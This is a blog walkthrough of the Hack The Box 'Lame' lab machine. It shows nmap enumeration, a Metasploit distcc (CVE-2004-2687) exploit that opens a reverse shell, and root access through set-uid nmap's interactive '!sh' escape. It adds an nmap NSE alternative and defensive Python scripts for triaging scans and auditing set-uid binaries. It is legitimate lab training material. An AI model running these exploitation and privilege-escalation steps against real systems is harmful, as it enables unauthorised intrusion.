Redhalo

Hack the Box Walkthrough – LAME machine

New walkthrough today about the easy machine LAME from Hack The Box. Judging by the number of owns, it is probably one of the easiest machines in HTB.

Let's jump in!

ENUMERATION

As usual we start with an nmap enumeration to see what we are dealing with.

[email protected]:~/Documents$ nmap -sC -sV -oA nmap 10.129.55.194 -p- -Pn
Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-28 03:42 EST
Nmap scan report for 10.129.55.194
Host is up (0.026s latency).
Not shown: 65530 filtered ports
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 10.10.14.106
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 2h32m53s, deviation: 3h32m10s, median: 2m51s
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.20-Debian)
|   Computer name: lame
|   NetBIOS computer name: 
|   Domain name: hackthebox.gr
|   FQDN: lame.hackthebox.gr
|_  System time: 2020-11-28T03:47:43-05:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 179.65 seconds
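As an added example (not part of the original walkthrough), here is a small Python triage script that reads this kind of plain-text nmap report and turns the weak settings visible in the scan above into a findings list a defender can act on. The sample report is trimmed from the scan output above; the rules and the severity labels are my own assumptions.

```python
import re

# Constructed sample: the relevant lines from the nmap -sC -sV output in this post.
SAMPLE_REPORT = """\
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
445/tcp  open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
| smb-security-mode:
|   account_used: guest
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
"""

# "21/tcp   open  ftp         vsftpd 2.3.4" -> port, proto, state, service, version
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")


def parse_ports(report):
    """Return {port: (service, version)} for every open port in an nmap -oN report."""
    ports = {}
    for line in report.splitlines():
        m = PORT_RE.match(line)
        if m and m.group(3) == "open":
            ports[int(m.group(1))] = (m.group(4), m.group(5).strip())
    return ports


def triage(report):
    """Turn the report into (severity, finding) pairs. Each rule is one weak setting
    the walkthrough goes on to rely on, so the list doubles as the fix list for the box."""
    ports = parse_ports(report)
    findings = []
    if "Anonymous FTP login allowed" in report:
        findings.append(("high", "anonymous FTP login enabled on port 21"))
    if "message_signing: disabled" in report:
        findings.append(("medium", "SMB message signing disabled"))
    if 445 in ports and "Protocol negotiation failed (SMB2)" in report:
        findings.append(("high", "SMB server only speaks SMB1 (NT1)"))
    if 3632 in ports and ports[3632][0] == "distccd":
        findings.append(("high", "distccd reachable from the network on port 3632"))
    return findings
```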

We see the FTP port open, and it allows anonymous login. Let's have a look:

[email protected]:~/Documents$ ftp 10.129.55.194
Connected to 10.129.55.194.
220 (vsFTPd 2.3.4)
Name (10.129.55.194:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
226 Directory send OK.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
226 Directory send OK.
ftp> 

Nothing interesting.

We also have Samba (SMB) running, so let's have a quick look:

[email protected]:~/Documents$ smbclient -L 10.129.55.194
protocol negotiation failed: NT_STATUS_CONNECTION_DISCONNECTED

Hmm, OK: protocol negotiation failed.

A look on Google gave the solution: edit the file /etc/samba/smb.conf on the attacking machine and add the following under the global section, so that our client will still negotiate SMB1 (NT1), the only dialect this old Samba 3.0.20 server offers:

client min protocol = NT1

Let's try again:

[email protected]:~/Documents$ smbclient -L 10.129.55.194
Enter WORKGROUP\kali's password: 
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        tmp             Disk      oh noes!
        opt             Disk      
        IPC$            IPC       IPC Service (lame server (Samba 3.0.20-Debian))
        ADMIN$          IPC       IPC Service (lame server (Samba 3.0.20-Debian))
Reconnecting with SMB1 for workgroup listing.
Anonymous login successful

        Server               Comment
        ---------            -------

        Workgroup            Master
        ---------            -------
        WORKGROUP            LAME

Maybe there is something interesting in the shared tmp folder:

[email protected]:~/Documents$ smbclient --no-pass //10.129.55.194/tmp
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat Nov 28 04:01:12 2020
  ..                                 DR        0  Sat Oct 31 03:33:58 2020
  .ICE-unix                          DH        0  Sat Nov 28 03:41:15 2020
  vmware-root                        DR        0  Sat Nov 28 03:41:38 2020
  .X11-unix                          DH        0  Sat Nov 28 03:41:42 2020
  .X0-lock                           HR       11  Sat Nov 28 03:41:42 2020
  5581.jsvc_up                        R        0  Sat Nov 28 03:42:29 2020
  vgauthsvclog.txt.0                  R     1600  Sat Nov 28 03:41:13 2020

                7282168 blocks of size 1024. 5385868 blocks available

Nope. What about the shared opt folder?

[email protected]:~/Documents$ smbclient --no-pass //10.129.55.194/opt
Anonymous login successful
tree connect failed: NT_STATUS_ACCESS_DENIED

Nope, access denied.

OK, then we have port 3632 open for distcc.

From Wikipedia, we know that distcc is a tool for speeding up compilation of source code by distributing the work over a computer network.

A search with searchsploit gives a nice result:

Let's give it a try.

FOOTHOLD

There are only two options to set:

I then added a payload and configured it.

Time now to run our exploit:

msf6 exploit(unix/misc/distcc_exec) > exploit

[*] Started reverse TCP double handler on 10.10.14.106:4444 
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo mm0VQUXWQUFfriyg;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "sh: line 2: Connected: command not found\r\nsh: line 3: Escape: command not found\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 1 opened (10.10.14.106:4444 -> 10.129.31.153:38737) at 2020-11-28 08:35:44 -0500

And we have a shell!

PRIVILEGE ESCALATION

By running linpeas I found out that nmap is installed, which may help with our privilege escalation.

Indeed, the interactive mode of this old nmap version can be used to execute shell commands, and since the shell it spawns inherits nmap's set-uid root privileges, we get root:

[email protected]:/tmp$ nmap --interactive
nmap --interactive

Starting Nmap V. 4.53 ( http://insecure.org )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
!sh
sh-3.2# whoami 
whoami
root

And we are root!
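An added example, not from the original post: a Python audit that finds set-uid binaries on a filesystem tree and flags the ones whose normal features include spawning a shell, which is exactly what nmap's interactive mode provides on this box. The shell-escape list is my own assumption, and the sample tree is a constructed fake /usr/local/bin created under a temp directory.

```python
import os
import stat
import tempfile

# Binaries whose normal features include spawning a shell; set-uid root on any
# of these is a privilege-escalation path, not just a hardening nit (assumed list).
SHELL_ESCAPE_BINARIES = {"nmap", "vim", "vi", "find", "bash", "sh", "python", "perl"}


def find_suid(root):
    """Return sorted paths of regular files under root that carry the set-uid bit."""
    hits = []
    for dirpath, _dirs, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # unreadable or vanished between listing and stat
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append(path)
    return sorted(hits)


def audit_suid(root):
    """Split set-uid files into (risky, other) by whether the tool can spawn a shell."""
    risky, other = [], []
    for path in find_suid(root):
        base = os.path.basename(path).rstrip("0123456789.")  # python3.9 -> python
        (risky if base in SHELL_ESCAPE_BINARIES else other).append(path)
    return risky, other


def fix_suid(path):
    """Mitigation: drop the set-uid bit from a binary that should never have had it."""
    mode = os.stat(path).st_mode & 0o7777
    os.chmod(path, mode & ~stat.S_ISUID)


def make_sample_tree():
    """Constructed sample: a fake /usr/local/bin with set-uid nmap and passwd."""
    root = tempfile.mkdtemp(prefix="suid-audit-")
    bindir = os.path.join(root, "usr", "local", "bin")
    os.makedirs(bindir)
    for name, setuid in (("nmap", True), ("passwd", True), ("ls", False)):
        path = os.path.join(bindir, name)
        with open(path, "w") as fh:
            fh.write("#!/bin/sh\n")  # placeholder body; only the mode matters here
        os.chmod(path, 0o4755 if setuid else 0o755)
    return root
```

Run it as `audit_suid("/")` on a real host; passwd-style set-uid helpers land in `other`, while anything in `risky` deserves `fix_suid` or a replacement that does not need set-uid at all.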

OTHER WAYS TO DO IT

I read here that we could also use nmap itself for the foothold, instead of Metasploit.

[email protected]:~$ sudo wget https://svn.nmap.org/nmap/scripts/distcc-cve2004-2687.nse -O /usr/share/nmap/scripts/distcc-exec.nse
[sudo] password for kali: 
--2020-11-28 09:01:51--  https://svn.nmap.org/nmap/scripts/distcc-cve2004-2687.nse
Resolving svn.nmap.org (svn.nmap.org)... 45.33.49.119, 2600:3c01:e000:3e6::6d4e:7061
Connecting to svn.nmap.org (svn.nmap.org)|45.33.49.119|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3519 (3.4K) [text/plain]
Saving to: ‘/usr/share/nmap/scripts/distcc-exec.nse’

/usr/share/nmap/scripts/distcc-exec.nse                    100%[=======================================================================================================================================>]   3.44K  --.-KB/s    in 0s      

2020-11-28 09:01:52 (128 MB/s) - ‘/usr/share/nmap/scripts/distcc-exec.nse’ saved [3519/3519]

Then run the following command:

[email protected]:~$ nmap -p 3632 10.129.31.153 --script distcc-exec --script-args="distcc-exec.cmd='id'" -Pn
Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-28 09:03 EST
Nmap scan report for 10.129.31.153
Host is up (0.025s latency).

PORT     STATE SERVICE
3632/tcp open  distccd
| distcc-exec: 
|   VULNERABLE:
|   distcc Daemon Command Execution
|     State: VULNERABLE (Exploitable)
|     IDs:  CVE:CVE-2004-2687
|     Risk factor: High  CVSSv2: 9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)
|       Allows executing of arbitrary commands on systems running distccd 3.1 and
|       earlier. The vulnerability is the consequence of weak service configuration.
|       
|     Disclosure date: 2002-02-01
|     Extra information:
|       
|     uid=1(daemon) gid=1(daemon) groups=1(daemon)
|   
|     References:
|       https://distcc.github.io/security.html
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2687
|_      https://nvd.nist.gov/vuln/detail/CVE-2004-2687

Nmap done: 1 IP address (1 host up) scanned in 0.40 seconds

Then, reading the HTB official write-up, I saw there was an easier way to do it.

They used the Metasploit module exploit/multi/samba/usermap_script and got root directly.